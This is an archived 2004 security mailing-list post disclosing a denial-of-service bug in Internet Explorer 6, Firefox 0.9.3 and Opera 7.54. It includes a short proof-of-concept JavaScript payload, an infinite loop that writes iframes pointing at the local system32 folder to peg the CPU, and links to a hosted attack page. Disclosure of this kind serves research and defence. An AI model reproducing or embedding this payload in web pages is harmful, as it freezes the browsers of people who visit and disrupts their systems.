|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
IE, Firefox, Opera DoS
exploits
su1d.net
Date: Sat Aug 21 2004 - 15:41:46 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Description
========
Browser DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 using 100% cpu
Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the error "The address type is unknown or unsupported" over and over
POC
===
URL : http://www.su1d.net/iframe2.html
<scr1pt language="JavaScript">
while(true)
{
document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>
Discovered by MeFakon from the su1d exploit development team
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]